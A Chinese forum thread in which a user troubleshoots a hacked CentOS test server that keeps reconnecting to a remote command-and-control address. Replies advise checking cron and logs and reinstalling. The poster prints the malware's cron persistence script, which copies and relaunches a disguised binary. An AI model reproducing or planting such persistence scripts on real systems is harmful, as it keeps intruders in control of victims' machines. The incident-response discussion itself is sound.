服务器被攻击了,杀死那个进程会自动重启一个
一台centos32位5.4版本的测试服务器,被攻击了。已经处理了一部分问题,还有一个问题:在netstat 中可以看到总有一个连接到 43.228.235.201:2897 的tcp 连接,
# netstat -antp|grep 2897
tcp 0 0 xx.xx.xx.xx:34124 43.228.235.201:2897 ESTABLISHED 10625/whoami
用kill -9 杀死这个进程,里面又会重启一个
tcp 0 0xx.xx.xx.xx:34123 43.228.235.201:2897 ESTABLISHED 10587/sleep 1
tcp 0 0 xx.xx.xx.xx:34122 43.228.235.201:2897 ESTABLISHED 10560/gnome-termina
43.228.235.201:2897 ESTABLISHED 10464/echo "find"
43.228.235.201:2897 ESTABLISHED 10401/who
43.228.235.201:2897 ESTABLISHED 10370/bash
43.228.235.201:2897 ESTABLISHED 10305/ifconfig
43.228.235.201:2897 ESTABLISHED 10263/netstat -anto
是我的内核被修改了吗?给我些建议,怎么处理下? 回复 1# meself_110
内核被修改的可能性极低。如果是内核模块被修改,那么我建议还是重装系统吧。(事实上我觉得不可能直接修改到内核)
杀掉又有进程重启的原因我认为可能是2个:
1.建立了自动执行任务crontab
2.有另外一个程序在不停的跑并且创建连接。
建议从这两个方向再排查下
回复 2# seanking1987
cron这个不是,这个服务在排查问题的时候,我已经停止服务了。
至于第二个有其他的进程,我在仔细看看进程列表吧,可能是对系统的进程不是很了解,暂时没看到有什么异常的,我能看到有异常的,我都处理了。
回复 3# meself_110
忘说了,既然是被攻击,那么可以查一下系统异常登录日志(不排除有可能攻击者已经删除),通过登录日志可以得到攻击者登录的时间以及用户。
那么就寻找这个被盗用的用户的相关启动进程就行了。如果是root被攻破,那就很麻烦了。还是建议重装 这种情况还是重新 装系统吧 回复 4# seanking1987
亲,果然是你说的这两个方向,我上面说是清理了定时任务,结果我昨天发现我没有清理干净,特别明显的一个sh竟然没有清理
# cat cron.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug
应该是我清理的时候,被别人叫走,回来的时候以为自己执行了删除了。
非常感谢你的回复。
回复 5# 付诸东流
测试用的机器,先自己找找问题,能处理的处理处理,当然我肯定要重装的,不然就凭我一个小菜鸟,肯定找不到隐藏深处的问题。
页:
[1]